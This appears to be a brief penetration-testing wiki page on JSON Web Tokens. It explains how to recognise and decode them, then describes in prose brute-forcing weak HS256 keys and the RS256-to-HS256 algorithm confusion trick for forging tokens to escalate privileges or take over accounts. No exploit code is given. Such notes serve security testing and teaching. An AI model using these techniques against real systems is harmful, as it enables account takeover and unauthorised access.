JWT
JSON Web Token (JWT) is a standard way to exchange information between client and server
Below is the "example JWT" from JWT.IO:
Notice the "." between each value, and notice the beginning is "eyJ"; these are indicative of a JWT. They are not encrypted; they are signed and can be read. If you find a JWT in the wild and want to view the contents, use one of the JWT decoders like https://jwt.ms or https://jwt.io.
If the algorithm is HMAC with SHA like HS256 and has a shared key, try to brute force it. Maybe the key is something simple like Password123.
If the algorithm is RSA with SHA like RS256 and signed with a certificate, you can try signing the request with the public key so that the signature is valid, and you can switch the protocol to a symmetric certificate algorithm to bypass the private key check. Has this happened in the wild? Absolutely.
Once you modify the JWT you are ready to try upgrading your account, changing your user, or possibly take over the system.
Last updated